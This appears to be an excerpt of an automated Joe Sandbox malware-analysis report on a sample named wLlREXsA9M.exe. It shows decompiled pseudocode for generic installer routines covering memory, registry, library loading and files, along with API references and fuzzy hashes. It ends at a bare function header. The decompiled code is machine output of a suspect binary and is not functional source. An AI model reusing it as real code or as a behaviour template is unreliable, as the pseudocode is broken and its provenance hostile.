0x00406a04
0x00406a07
0x00000000
0x00406a09
0x00406786
0x00406786
0x00000000
0x00406786
0x00406a07
0x00406c3c
0x00000000
0x00000000
0x0040626b
0x00406c73
0x00406c73
0x00000000
0x00406c73
0x00406ac0
0x00406a47
0x00406a44

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ade7ce5a49ccb4e88e03029485603bf9df32c55c5ad1f19d8e87ce4eb2cc5b30
Instruction ID: e5d93825263836feeab6840524b8eb21a2520de61a8cdfcbd14f6f76199049d3
Opcode Fuzzy Hash: ade7ce5a49ccb4e88e03029485603bf9df32c55c5ad1f19d8e87ce4eb2cc5b30
Instruction Fuzzy Hash: 25714671E04228CBEF28CF98C844BADBBB1FF45305F15806AD856BB291C7789956DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00401B5D Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B5D(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40a7ec; // 0x7fed98
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc("true", 0x404); // executed
						_t34 = _t8;
						E00405DAF(__ebx, _t30, _t34, _t34 + 4,  *((intOrPtr*)(_t37 - 0x28)));
						_t11 =  *0x40a7ec; // 0x7fed98
						 *_t34 = _t11;
						 *0x40a7ec = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x7fed9c
							E00405D8D(_t33, _t2);
							_push(_t30);
							 *0x40a7ec =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = "Call";
								E00405D8D(_t36, _t30 + 4);
								_t21 =  *0x40a7ec; // 0x7fed98
								E00405D8D(_t32, _t21 + 4);
								_t24 =  *0x40a7ec; // 0x7fed98
								_push(_t36);
								_push(_t24 + 4);
								E00405D8D();
								L15:
								 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00405DAF(_t27, _t30, _t33, _t27, "true"));
					E00405583();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}

0x00401b5d
0x00401b5d
0x00401b60
0x00401b68
0x00401bb0
0x00401bde
0x00401be7
0x00401bed
0x00401bf2
0x00401bf7
0x00401bf9
0x00401bb2
0x00401bb4
0x00402729
0x00401bba
0x00401bba
0x00401bbf
0x00401bc6
0x00401bc7
0x00401bcc
0x00401bcc
0x00401bb4
0x00000000
0x00401b6a
0x00401b6a
0x00401b6a
0x00401b6d
0x00000000
0x00000000
0x00401b73
0x00401b77
0x00000000
0x00401b79
0x00401b7b
0x00000000
0x00401b81
0x00401b81
0x00401b84
0x00401b8b
0x00401b90
0x00401b9a
0x00401b9f
0x00401ba4
0x00401ba8
0x0040287c
0x0040295e
0x00402961
0x00402967
0x00402967
0x00401b7b
0x00000000
0x00401b77
0x004022ca
0x004022d7
0x004022d8
0x004022dd
0x004022dd
0x00402969
0x0040296d

APIs

GlobalFree.KERNEL32(007FED98), ref: 00401BCC
GlobalAlloc.KERNELBASE(?,00000404), ref: 00401BDE

Strings

Call, xrefs: 00401B84, 00401B8A, 00401BA4

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call
API String ID: 3394109436-1824292864
Opcode ID: 2bea442bb86fa6e1b9605fc71a662c375029c5f40a88b906105b64c8c4230cd0
Instruction ID: 1d471e109cb253c7fb2e23cf66981bd1b04a0be0714fe99423a01e962438971b
Opcode Fuzzy Hash: 2bea442bb86fa6e1b9605fc71a662c375029c5f40a88b906105b64c8c4230cd0
Instruction Fuzzy Hash: F32181B6600215ABCB10EFA58E8896A72B9DB48314B24853BF601F32D1D77DD9118B5E

Uniqueness

Uniqueness Score: -1.00%

Function 004024F5 Relevance: 4.5, APIs: 3, Instructions: 46
registryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004024F5(int* __ebx, intOrPtr __edx, char* __esi) {
				void* _t8;
				int _t9;
				long _t12;
				int* _t15;
				intOrPtr _t20;
				void* _t21;
				char* _t23;
				void* _t25;
				void* _t28;

				_t23 = __esi;
				_t20 = __edx;
				_t15 = __ebx;
				_t8 = E00402BD8(_t28, 0x20019); // executed
				_t21 = _t8;
				_t9 = E00402AAC(3);
				 *((intOrPtr*)(_t25 - 0x38)) = _t20;
				 *__esi = __ebx;
				if(_t21 == __ebx) {
					L7:
					 *((intOrPtr*)(_t25 - 4)) = 1;
				} else {
					 *(_t25 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t25 - 0x18)) == __ebx) {
						_t12 = RegEnumValueA(_t21, _t9, __esi, _t25 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t12;
						if(_t12 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyA(_t21, _t9, __esi, 0x3ff);
						L4:
						_t23[0x3ff] = _t15;
						_push(_t21);
						RegCloseKey();
					}
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t25 - 4));
				return 0;
			}

0x004024f5
0x004024f5
0x004024f5
0x004024fa
0x00402501
0x00402503
0x0040250b
0x0040250e
0x00402510
0x00402729
0x00402729
0x00402516
0x0040251e
0x00402521
0x0040253a
0x00402540
0x00402542
0x00000000
0x00000000
0x00000000
0x00000000
0x00402523
0x00402527
0x00402548
0x00402548
0x0040254e
0x0040254f
0x0040254f
0x00402521
0x00402961
0x0040296d

APIs

Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,000000A1,00000000,00000022,00000000,?,?), ref: 00402C00

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402527
RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 0040253A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nssF823.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 4ead497885ab0e73cb68caad978bfc4cfd994f4c6e81d2865e6aff0ce3f6ce61
Instruction ID: 2016f2186d7933ea8b440865bed1503d9c132f9617b802d331d8005b4180e8f3
Opcode Fuzzy Hash: 4ead497885ab0e73cb68caad978bfc4cfd994f4c6e81d2865e6aff0ce3f6ce61
Instruction Fuzzy Hash: E701DFB1A04201FFE7119F65AD88ABF7ABCDF40395F20003FF105A61C0D6B84A41966A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423730;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x422eec =  *0x422eec + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x422eec, 0x7530,  *0x422ed4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00401E25 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E43
EnableWindow.USER32(00000000,00000000), ref: 00401E4E

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 994d8dcd6d1969f9da41b76263b3184155ea640db64b7aca36bf14edda3ef561
Instruction ID: cac259bc1fb1987fb79619b2e1ab3e3d0acc06dd6564aa30abcfd8b6c9a9958f
Opcode Fuzzy Hash: 994d8dcd6d1969f9da41b76263b3184155ea640db64b7aca36bf14edda3ef561
Instruction Fuzzy Hash: B1E012B2B08211AFEB14EFB4E9895AD7BB4EF40325B20403BE401F11D1D67D59419B59

Uniqueness

Uniqueness Score: -1.00%

Function 00406126 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406126(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409240);
				_t5 = GetModuleHandleA( *(_t10 + 0x409240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x409244));
				}
				_t5 = E004060B8(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x0040612e
0x00406131
0x00406138
0x00406140
0x0040614c
0x00000000
0x00406153
0x00406143
0x0040614a
0x00000000
0x0040615b
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,004031D7,00000009), ref: 00406138
GetProcAddress.KERNEL32(00000000,?), ref: 00406153

Part of subcall function 004060B8: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060CF
Part of subcall function 004060B8: wsprintfA.USER32 ref: 00406108
Part of subcall function 004060B8: LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 0040611C

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction ID: bd00377ecae085c601f725ecdc363b307fe21ac73b629bc8d676489e2a4cf6bd
Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction Fuzzy Hash: CDE08632A08111A6D3107A705D0493B73AC9E85740302483EF906F6292D738AC2197AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405A00 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405A00(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405a04
0x00405a11
0x00405a26
0x00405a2c

APIs

GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\wLlREXsA9M.exe,80000000,00000003), ref: 00405A04
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A26

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26

Uniqueness

Uniqueness Score: -1.00%

Function 004054E9 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054E9(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004054ef
0x004054f7
0x00000000
0x004054fd
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403160,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040335D), ref: 004054EF
GetLastError.KERNEL32 ref: 004054FD

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction ID: c7f2f30b9a3d26464c022aaf6f3d76bf404db098807a94025f58e0c6d583f02b
Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction Fuzzy Hash: A0C04C70A29502EADA105B24DE087177D55AB50741F1149756506E10E4D634A451DA2E

Uniqueness

Uniqueness Score: -1.00%

Function 100027E8 Relevance: 2.7, APIs: 2, Instructions: 156
memoryCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E100027E8(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				void* _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004040 != 0 && E10002767(_a4) == 0) {
					 *0x10004044 = _t106;
					if( *0x1000403c != 0) {
						_t106 =  *0x1000403c;
					} else {
						E10002D20(E10002761(), __ecx);
						 *0x1000403c = _t106;
					}
				}
				_t31 = E100027A3(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E10002797();
					_t81 = _a4;
					_t90 =  *0x10004048;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004048 = _t81;
					E10002791();
					_t36 = VirtualAlloc(??, ??, ??, ??); // executed
					 *0x1000401c = _t36;
					 *0x10004020 = _t90;
					if( *0x10004040 != 0 && E10002767( *0x10004048) == 0) {
						 *0x1000403c = _t107;
						_t107 =  *0x10004044;
					}
					_t91 =  *0x10004048;
					_a4 = _t91;
					 *0x10004048 =  *((intOrPtr*)(E10002797() + _t91));
					_t40 = E10002775(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E100027A3(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E100027AE() + _a4 + _v8);
							_push(E100027B8());
							if( *0x10004040 <= 0 || E10002767(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000403c =  *0x1000403c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004048 == 0) {
						 *0x1000403c = 0;
					}
					_t94 = _a4 + E100027AE();
					 *(E100027BC() + _t94) =  *0x1000401c;
					 *((intOrPtr*)(E100027C0() + _t94)) =  *0x10004020;
					E100027D0(_a4);
					if(E10002783() != 0) {
						 *0x10004058 = GetLastError();
					}
					return _a4;
				}
				_push(E100027AE() + _a4);
				_t65 = E100027B4();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E100027C0();
				_t100 = E100027BC();
				_t103 = E100027B8();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x100027f8
0x10002809
0x10002816
0x1000282a
0x10002818
0x1000281d
0x10002822
0x10002822
0x10002816
0x10002833
0x10002838
0x1000283e
0x10002882
0x10002882
0x10002887
0x1000288c
0x10002892
0x10002894
0x1000289a
0x100028a7
0x100028a9
0x100028ae
0x100028bb
0x100028ce
0x100028d4
0x100028da
0x100028db
0x100028e1
0x100028ed
0x100028f3
0x100028fb
0x100028fc
0x100028ff
0x1000290a
0x1000290c
0x10002918
0x1000291e
0x10002926
0x10002952
0x10002953
0x10002959
0x10002959
0x10002960
0x10002936
0x10002936
0x10002937
0x10002945
0x1000294e
0x1000294e
0x10002926
0x1000290a
0x10002969
0x1000296b
0x1000296b
0x1000297d
0x1000298a
0x10002998
0x1000299e
0x100029ac
0x100029b4
0x100029b4
0x100029c2
0x100029c2
0x10002849
0x1000284a
0x1000284f
0x10002853
0x10002858
0x1000286c
0x1000286d
0x1000286e
0x10002870
0x10002875
0x10002877
0x10002877
0x1000287a
0x10002880
0x00000000

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 100028A7
GetLastError.KERNEL32 ref: 100029AE

Memory Dump Source

Source File: 00000000.00000002.1046900983.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1046873048.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046935240.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1046965779.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_wLlREXsA9M.jbxd

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95

Uniqueness

Uniqueness Score: -1.00%

Function 00405A78 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A78(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405a7c
0x00405a8c
0x00405a94
0x00000000
0x00405a9b
0x00000000
0x00405a9d

APIs

ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,00403122,00000000,00000000,00402F7F,000000FF,?,00000000,00000000,00000000), ref: 00405A8C

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction ID: 7e43a2064b92995b66187a331164fa3a115b2dcaaf2e5842aa1ec3f391e99d05
Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction Fuzzy Hash: EDE0EC3261425AABDF109E659C84FEB7B6CFF053A0F448533F915E2190E335E8219FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402BD8 Relevance: 1.5, APIs: 1, Instructions: 22
registryCOMMON

